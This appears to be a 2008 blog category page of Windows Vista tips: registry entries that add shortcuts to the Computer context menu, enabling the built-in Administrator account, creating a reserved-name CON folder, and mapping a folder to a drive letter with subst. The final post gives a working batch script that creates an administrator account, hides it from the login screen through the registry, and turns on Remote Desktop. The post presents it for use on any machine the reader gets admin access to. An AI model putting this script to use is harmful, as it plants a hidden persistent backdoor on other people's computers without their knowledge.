Your best source of information and news about BIOS, xp and windows on the internet

Vista ARTICLES TOP 50 Spyware Virus Vista SOFT Vista HELP

WindowS HackS

You are currently browsing the articles from MS Windows Vista Compatible Software matching the category WindowS HackS.

Windows Vista Registry Tweak:Add Shortcut to Context Menu Handler of Computer and Desktop

To create context menu handler under Computer in Windows Vista, navigate the registry to: HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell
{20D04FE0-3AEA-1069-A2D8-08002B30309D} is GUID (Global Unique Identifier of Computer)
NOTE: There is no need to convert the String value (REG_SZ) to String Expand (REG_EXPAND_SZ).
Create a Windows Vista registry key as you wish, lets us say gpedit & set the default value like “Group Policy”; now create another key named as command and set the default value as “mmc.exe gpedit.msc”

Here is some registry code to add Services, Registry Editor, and Group Policy & so on.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}]
@=”Computer”
“InfoTip”=hex(2):40,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,\
6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,\
00,73,00,68,00,65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,\
2d,00,32,00,32,00,39,00,31,00,33,00,00,00
“LocalizedString”=hex(2):40,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,\
6f,00,6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\
00,5c,00,73,00,68,00,65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,\
2c,00,2d,00,39,00,32,00,31,00,36,00,00,00

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,69,00,6d,00,\
61,00,67,00,65,00,72,00,65,00,73,00,2e,00,64,00,6c,00,6c,00,2c,00,2d,00,31,\
00,30,00,39,00,00,00

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,\
65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,00,00
“ThreadingModel”=”Apartment”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell]
@=”none”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\devmgmt]
@=”&Device Manger”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\devmgmt\command]
@=”mmc.exe devmgmt.msc”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find]
@=hex(2):40,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,\
68,00,65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,2d,00,38,\
00,35,00,30,00,33,00,00,00
“SuppressionPolicy”=dword:00000080

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,65,00,78,00,\
65,00,00,00

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\ddeexec]
@=”[FindFolder(\”%l\”, %I)]”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\ddeexec\application]
@=”Folders”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\ddeexec\topic]
@=”AppProperties”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\gpedit]
@=”Group Policy”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\gpedit\command]
@=”mmc gpedit.msc”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage]
@=hex(2):40,00,25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,74,\
00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6d,00,\
79,00,63,00,6f,00,6d,00,70,00,75,00,74,00,2e,00,64,00,6c,00,6c,00,2c,00,2d,\
00,34,00,30,00,30,00,00,00
“MUIVerb”=hex(2):40,00,25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,\
6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,\
00,6d,00,79,00,63,00,6f,00,6d,00,70,00,75,00,74,00,2e,00,64,00,6c,00,6c,00,\
2c,00,2d,00,34,00,30,00,30,00,00,00
“SuppressionPolicy”=dword:4000003c

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,43,00,6f,00,\
6d,00,70,00,4d,00,67,00,6d,00,74,00,4c,00,61,00,75,00,6e,00,63,00,68,00,65,\
00,72,00,2e,00,65,00,78,00,65,00,00,00

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\regedit]
@=”&Registry Editor”

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\regedit\command]
@=”regedit.exe”

Click to continue reading "Windows Vista Registry Tweak:Add Shortcut to Context Menu Handler of Computer and Desktop"

Written by magakos on July 28th, 2008 with 2 comments.
Read more articles on Registry Tweaks and WindowS HackS and All and otherSoftware.

Tip to Make your Windows Vista’s Admin Account Works as Real Administror

·

For Windows Vista Ultimate /Business/ Enterprise versions :
  • Click on Windows Vista Start, and type in “secpol.msc” in the search area and click Enter. (You may receive a prompt from UAC,(User Account Control) approve/login and proceed)
  • In the left list, choose “Local Policies“, then “Security Options
  • Set “Accounts: Administrator account status” to Enabled.
  • Set “User Account Control: Admin Approval Mode for the Built-in Administrator account” to Disabled.

For Windows Vista Home Basic / Home Premium versions:
  • Click on Windows Vista Start, and type in “cmd” in the search area, right click on “Command Prompt” and select ‘Run as Administrator” option from the opened context menu.
  • In the opened elevated command prompt type in “net users Administrator /active:yes” (Note the capital “A” in Administrator) and press Enter, you will get a confirmation as “The command completed successfully”.
  • Click on Windows Vista Start again, and type in “regedit” in the search area and click Enter to open the Windows Vista registry editor.Then navigate to the following

Click to continue reading "Tip to Make your Windows Vista’s Admin Account Works as Real Administror"

Written by magakos on July 28th, 2008 with no comments.
Read more articles on WindowS HackS and All and otherSoftware.

How to create con folder

CON is a reserve world in windows operating system.
that’s why we can not create the folder named as
CON.

But by command prompt we can do this

STEP1: goto command prompt
STEP2: type in prompt e:\> “mkdir \\.\e:\con”
STEP3: verify by typing “dir \\.\e:\con”
STEP4: delete the file or folder “rmdir \\.\e:\con”

ollowing file names in Windows are reserved because they represent devices:
con, con.* -> the console
prn, prn.* -> the default printer, as a character device
aux, aux.* -> the default serial terminal, as a character device
lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -> the parallel ports, as character devices
lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*
com1, com2, com3, com4, com5, com6, com7, com8, com9 -> the serial ports, as character devices
com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*
nul, nul.* -> the NUL or “waste bit bucket” or “black hole for bits” or “/dev/null” device

Such files are considered to “exist” in all directories, so if you have a filename like “c:\temp\con”, you’re talking

Click to continue reading "How to create con folder"

Written by magakos on July 25th, 2008 with no comments.
Read more articles on WindowS HackS and All and otherSoftware.

Create a Virtual Drive for any folder in Vista

There is a secret in MS DOS command ” subst” which is used to create a virtual drive letter for any folder in My Computer screen.

For example, if u want to use a folder called “new_folder” which is kept in” E:\new\downloads\ ” then you can create a virtual drive say “Z:” in My Computer.

Here is the procedure.

1. Open Command prompt from , Start–>Run–> cmd

then type, subst drive-letter:folder-path

i.e., for example,

subst Z: E:\new\downloads\

2. If you want to delete this virtual drive, then provide following command:

subst drive_letter: /D

for example,

subst z: /D

Written by magakos on July 25th, 2008 with 1 comment.
Read more articles on WindowS HackS and All and otherSoftware.

Enable / Activate Hidden Administrator Account in Windows Vista

In Windows XP and the earlier Windows versions, there was only one administrator account and most single users used it as their main account. But Windows Vista has another, what may be referred to as a secret ’super’ administrator account. It is hidden & turned off by default, and is similar to the ‘root’ account in Unix.The use of the Administrator account is being phased out in Windows Vista, and there’s actually seldom a need to use it, instead of another administrator account. On installation of Windows Vista, the Administrator account is disabled; but if you upgrade from Windows XP and Administrator is the only active local administrator account, then Administrator remains enabled. In this situation, it is placed in Approval Mode, for purposes of UAC(User Account Control). Since it is not subject to UAC prompts and runs with full administrative privileges, it’s rather risky, to run it on a regular basis. Any application could then have full control of the computer. So I suggest using it sparingly, only when you need to perform several administrative and don’t want to be bothered by UAC prompts. Initially, this ’super’ Administrator account does not have a password, a serious vulnerability for

Click to continue reading "Enable / Activate Hidden Administrator Account in Windows Vista"

Written by magakos on July 19th, 2008 with no comments.
Read more articles on WindowS HackS and All and otherSoftware.

How to make a Hidden Admin Account using bat Script !

Hey guys i have been playing around with bat scripts and i found this small code that will let you create a admin account and hide it from the super admin. so in case you get a chance to access a box with admin status all you have to do is to copy this code to note pad and make the changes and save it as .bat and run it. and then you have your own admin account which is hidden :) {Original Code by Netanelj Credits goes to AgentSmith15 for the Dynamic codes}

@Echo Off

SET /P usr=[Enter new username here:]

SET /P pwd=[Enter new password here:]

:: SET /P takes the user input and puts it into the variable.

echo — Creating New User, “%usr%” with password “%pwd%” –

net user “%usr%” “%pwd%” /add

echo — Adding User to Group Administrator –

net localgroup Administrators %usr% /add

echo — User Is Now Administrator — >>

echo — Hidding User –

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f

echo — Activating Terminal Service –

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

echo — Activating Terminal Service Done –

SET /P =Press Enter to continue . . .

Exit

Click to continue reading "How to make a Hidden Admin Account using bat Script !"

Written by magakos on July 15th, 2008 with 1 comment.
Read more articles on Scripts and WindowS HackS and All and otherSoftware.

« Older articles

Newer articles »